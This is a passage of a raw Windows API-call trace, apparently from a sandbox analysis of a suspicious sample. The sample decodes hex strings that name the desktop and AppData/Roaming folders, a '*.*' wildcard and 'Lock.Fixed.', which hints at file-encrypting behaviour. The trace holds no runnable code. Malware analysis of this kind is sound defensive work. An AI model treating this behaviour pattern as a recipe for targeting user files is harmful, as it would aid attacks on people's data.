wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.048] lstrlenW (lpString="6F") returned 2 [0082.048] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] lstrlenW (lpString="63") returned 2 [0082.049] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] lstrlenW (lpString="6B") returned 2 [0082.049] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] lstrlenW (lpString="2E") returned 2 [0082.049] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.049] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] lstrlenW (lpString="38") returned 2 [0082.049] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] lstrlenW (lpString="38") returned 2 [0082.049] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.049] lstrlenW (lpString="38") returned 2 [0082.049] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.049] lstrlenW (lpString="20") returned 2 [0082.049] lstrlenW (lpString="40") returned 2 [0082.049] lstrlenW (lpString="44") returned 2 [0082.049] lstrlenW (lpString="65") returned 2 [0082.049] lstrlenW (lpString="73") returned 2 [0082.050] lstrlenW (lpString="6B") returned 2 [0082.050] lstrlenW (lpString="74") returned 2 [0082.050] lstrlenW (lpString="6F") returned 2 [0082.050] lstrlenW (lpString="70") returned 2 [0082.050] lstrlenW (lpString="44") returned 2 [0082.050] lstrlenW (lpString="69") returned 2 [0082.050] lstrlenW (lpString="72") returned 2 [0082.050] lstrlenW (lpString="20") returned 2 [0082.050] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.050] lstrlenW (lpString="2F") returned 2 [0082.050] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.050] lstrlenW (lpString="20") returned 2 [0082.050] lstrlenW (lpString="40") returned 2 [0082.050] lstrlenW (lpString="44") returned 2 [0082.051] lstrlenW (lpString="65") returned 2 [0082.051] lstrlenW (lpString="73") returned 2 [0082.051] lstrlenW (lpString="6B") returned 2 [0082.089] lstrlenW (lpString="74") returned 2 [0082.089] lstrlenW (lpString="6F") returned 2 [0082.089] lstrlenW (lpString="70") returned 2 [0082.089] lstrlenW (lpString="44") returned 2 [0082.089] lstrlenW (lpString="69") returned 2 [0082.089] lstrlenW (lpString="72") returned 2 [0082.089] lstrlenW (lpString="20") returned 2 [0082.089] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.089] lstrlenW (lpString="2F") returned 2 [0082.089] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.089] lstrlenW (lpString="20") returned 2 [0082.089] lstrlenW (lpString="31") returned 2 [0082.089] lstrlenW (lpString="20") returned 2 [0082.089] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.089] lstrlenW (lpString="20") returned 2 [0082.089] lstrlenW (lpString="40") returned 2 [0082.089] lstrlenW (lpString="55") returned 2 [0082.089] lstrlenW (lpString="73") returned 2 [0082.089] lstrlenW (lpString="65") returned 2 [0082.089] lstrlenW (lpString="72") returned 2 [0082.090] lstrlenW (lpString="50") returned 2 [0082.090] lstrlenW (lpString="72") returned 2 [0082.090] lstrlenW (lpString="6F") returned 2 [0082.090] lstrlenW (lpString="66") returned 2 [0082.090] lstrlenW (lpString="69") returned 2 [0082.090] lstrlenW (lpString="6C") returned 2 [0082.090] lstrlenW (lpString="65") returned 2 [0082.090] lstrlenW (lpString="44") returned 2 [0082.090] lstrlenW (lpString="69") returned 2 [0082.090] lstrlenW (lpString="72") returned 2 [0082.090] lstrlenW (lpString="20") returned 2 [0082.090] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.090] lstrlenW (lpString="2F") returned 2 [0082.090] lstrlenW (lpString="41") returned 2 [0082.090] lstrlenW (lpString="70") returned 2 [0082.090] lstrlenW (lpString="70") returned 2 [0082.090] lstrlenW (lpString="44") returned 2 [0082.090] lstrlenW (lpString="61") returned 2 [0082.090] lstrlenW (lpString="74") returned 2 [0082.090] lstrlenW (lpString="61") returned 2 [0082.090] lstrlenW (lpString="2F") returned 2 [0082.090] lstrlenW (lpString="52") returned 2 [0082.090] lstrlenW (lpString="6F") returned 2 [0082.090] lstrlenW (lpString="61") returned 2 [0082.090] lstrlenW (lpString="6D") returned 2 [0082.090] lstrlenW (lpString="69") returned 2 [0082.091] lstrlenW (lpString="6E") returned 2 [0082.091] lstrlenW (lpString="67") returned 2 [0082.127] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.127] lstrlenW (lpString="2A") returned 2 [0082.127] lstrlenW (lpString="2E") returned 2 [0082.127] lstrlenW (lpString="2A") returned 2 [0082.127] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.127] lstrlenW (lpString="20") returned 2 [0082.127] lstrlenW (lpString="31") returned 2 [0082.127] lstrlenW (lpString="20") returned 2 [0082.127] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.127] lstrlenW (lpString="20") returned 2 [0082.127] lstrlenW (lpString="31") returned 2 [0082.127] lstrlenW (lpString="20") returned 2 [0082.127] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.127] lstrlenW (lpString="20") returned 2 [0082.127] lstrlenW (lpString="30") returned 2 [0082.127] lstrlenW (lpString="20") returned 2 [0082.127] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.127] lstrlenW (lpString="20") returned 2 [0082.127] lstrlenW (lpString="31") returned 2 [0082.127] lstrlenW (lpString="20") returned 2 [0082.127] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.127] lstrlenW (lpString="4C") returned 2 [0082.128] lstrlenW (lpString="6F") returned 2 [0082.128] lstrlenW (lpString="63") returned 2 [0082.128] lstrlenW (lpString="6B") returned 2 [0082.128] lstrlenW (lpString="2E") returned 2 [0082.128] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.128] lstrlenW (lpString="46") returned 2 [0082.128] lstrlenW (lpString="69") returned 2 [0082.128] lstrlenW (lpString="78") returned 2 [0082.128] lstrlenW (lpString="65") returned 2 [0082.128] lstrlenW (lpString="64") returned 2 [0082.128] lstrlenW (lpString="2E") returned 2 [0082.128] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.128] lstrlenW (lpString="20") returned 2 [0082.128] lstrlenW (lpString="40") returned 2 [0082.128] lstrlenW (lpString="55") returned 2 [0082.128] lstrlenW (lpString="73") returned 2 [0082.128] lstrlenW (lpString="65") returned 2 [0082.128] lstrlenW (lpString="72") returned 2 [0082.128] lstrlenW (lpString="50") returned 2 [0082.129] lstrlenW (lpString="72") returned 2 [0082.129] lstrlenW (lpString="6F") returned 2 [0082.129] lstrlenW (lpString="66") returned 2 [0082.129] lstrlenW (lpString="69") returned 2 [0082.129] lstrlenW (lpString="6C") returned 2 [0082.168] lstrlenW (lpString="65") returned 2 [0082.168] lstrlenW (lpString="44") returned 2 [0082.168] lstrlenW (lpString="69") returned 2 [0082.169] lstrlenW (lpString="72") returned 2 [0082.169] lstrlenW (lpString="20") returned 2 [0082.169] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.169] lstrlenW (lpString="2F") returned 2 [0082.169] lstrlenW (lpString="41") returned 2 [0082.169] lstrlenW (lpString="70") returned 2 [0082.169] lstrlenW (lpString="70") returned 2 [0082.169] lstrlenW (lpString="44") returned 2 [0082.169] lstrlenW (lpString="61") returned 2 [0082.169] lstrlenW (lpString="74") returned 2 [0082.169] lstrlenW (lpString="61") returned 2 [0082.169] lstrlenW (lpString="2F") returned 2 [0082.169] lstrlenW (lpString="52") returned 2 [0082.169] lstrlenW (lpString="6F") returned 2 [0082.169] lstrlenW (lpString="61") returned 2 [0082.169] lstrlenW (lpString="6D") returned 2 [0082.169] lstrlenW (lpString="69") returned 2 [0082.169] lstrlenW (lpString="6E") returned 2 [0082.169] lstrlenW (lpString="67") returned 2 [0082.169] lstrlenW (lpString="2F") returned 2 [0082.169] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.169] lstrlenW (lpString="20") returned 2 [0082.169] lstrlenW (lpString="40") returned 2 [0082.169] lstrlenW (lpString="55") returned 2 [0082.170] lstrlenW (lpString="73") returned 2 [0082.170] lstrlenW (lpString="65") returned 2 [0082.170] lstrlenW (lpString="72") returned 2 [0082.170] lstrlenW (lpString="50") returned 2 [0082.170] lstrlenW (lpString="72") returned 2 [0082.170] lstrlenW (lpString="6F") returned 2 [0082.170] lstrlenW (lpString="66") returned 2 [0082.170] lstrlenW (lpString="69") returned 2 [0082.170] lstrlenW (lpString="6C") returned 2 [0082.170] lstrlenW (lpString="65") returned 2 [0082.170] lstrlenW (lpString="44") returned 2 [0082.170] lstrlenW (lpString="69") returned 2 [0082.170] lstrlenW (lpString="72") returned 2 [0082.170] lstrlenW (lpString="20") returned 2 [0082.170] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.170] lstrlenW (lpString="2F") returned 2 [0082.170] lstrlenW (lpString="41") returned 2 [0082.170] lstrlenW (lpString="70") returned 2 [0082.170] lstrlenW (lpString="70") returned 2 [0082.170] lstrlenW (lpString="44") returned 2 [0082.170] lstrlenW (lpString="61") returned 2 [0082.205] lstrlenW (lpString="74") returned 2 [0082.205] lstrlenW (lpString="61") returned 2 [0082.206] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.206] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.206] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.246] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.246] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.246] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.246] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.301] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.301] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.301] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.301] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.301] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.373] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.373] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.373] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.373] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.373] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.413] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.413] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.413] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.413] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.528] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.528] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.567] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.567] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.567] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.568] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.568] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.568] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.568] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.568] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.636] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.636] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.636] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.636] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.636] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.636] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.636] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.636] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.636] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.636] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.675] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.675] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.675] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.675] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.675] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.675] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.675] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.675] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0082.721] TranslateMessage (lpMsg=0x8cf488) returned 0 [0082.721] DispatchMessageW (lpMsg=0x8cf488) returned 0x0 [0082.721] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0082.721] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0082.721] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.721] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b6f8 [0082.721] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee590 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5a8 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b778 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee608 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee650 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b728 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee668 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee698 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5e8 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee848 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5e8 | out: hHeap=0x2af0000) returned 1 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea28 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b588 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b588 | out: hHeap=0x2af0000) returned 1 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eea70 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b5e8 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5e8 | out: hHeap=0x2af0000) returned 1 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee878 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b668 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee968 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee848 | out: hHeap=0x2af0000) returned 1 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee698 | out: hHeap=0x2af0000) returned 1 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea28 | out: hHeap=0x2af0000) returned 1 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eea70 | out: hHeap=0x2af0000) returned 1 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee668 | out: hHeap=0x2af0000) returned 1 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b728 | out: hHeap=0x2af0000) returned 1 [0082.722] lstrlenW (lpString="20") returned 2 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee878 | out: hHeap=0x2af0000) returned 1 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b668 | out: hHeap=0x2af0000) returned 1 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee968 | out: hHeap=0x2af0000) returned 1 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee650 | out: hHeap=0x2af0000) returned 1 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee608 | out: hHeap=0x2af0000) returned 1 [0082.722] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b778 | out: hHeap=0x2af0000) returned 1 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee608 [0082.722] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee650 [0082.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b5d8 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5a8 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee590 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6f8 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee650 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b5d8 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee608 | out: hHeap=0x2af0000) returned 1 [0082.723] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0082.723] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0082.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b6b8 [0082.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee650 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6b8 | out: hHeap=0x2af0000) returned 1 [0082.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee590 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee650 | out: hHeap=0x2af0000) returned 1 [0082.723] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee5a8 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee590 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee4d0 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee728 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e3bb0 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b708 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e3b88 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee578 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee4e8 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6a8 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e3cc8 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee638 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee530 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e4268 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6d8 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e3cf0 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee7b8 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b768 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee710 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee620 | out: hHeap=0x2af0000) returned 1 [0082.723] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee770 | out: hHeap=0x2af0000) returned 1 [0082.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5f0 | out: hHeap=0x2af0000) returned 1 [0082.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b6c8 | out: hHeap=0x2af0000) returned 1 [0082.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee518 | out: hHeap=0x2af0000) returned 1 [0082.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b0b8 | out: hHeap=0x2af0000) returned 1 [0082.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5d8 | out: hHeap=0x2af0000) returned 1 [0082.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee578 [0082.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee5a8 | out: hHeap=0x2af0000) returned 1 [0082.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) 